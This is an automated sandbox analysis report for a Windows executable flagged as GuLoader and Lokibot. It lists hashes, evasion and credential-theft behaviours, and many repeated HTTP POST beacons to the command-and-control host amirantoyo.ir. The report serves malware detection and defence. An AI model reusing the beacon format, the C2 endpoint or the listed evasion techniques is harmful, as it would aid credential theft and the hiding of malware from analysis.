Windows Analysis Report 8rbuJ8Ycv1.exe

Overview

General Information

Sample Name: 8rbuJ8Ycv1.exe
Analysis ID: 451510
MD5: 546f9c26cb739f1e3ea5ba1605aa7328
SHA1: 452ee936bbade0510c6c56d6e2b25f6ce7b835ff
SHA256: 6bd6a8e685288ca0af1d41d4d88fabd465f211c7cef32c00c994b89ea0a94f51

Detection

GuLoader Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: 8rbuJ8Ycv1.exe ReversingLabs: Detection: 41%

Compliance:

Uses 32bit PE files
Source: 8rbuJ8Ycv1.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 199.195.117.165:443 -> 192.168.2.4:49772 version: TLS 1.2

Networking:

JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
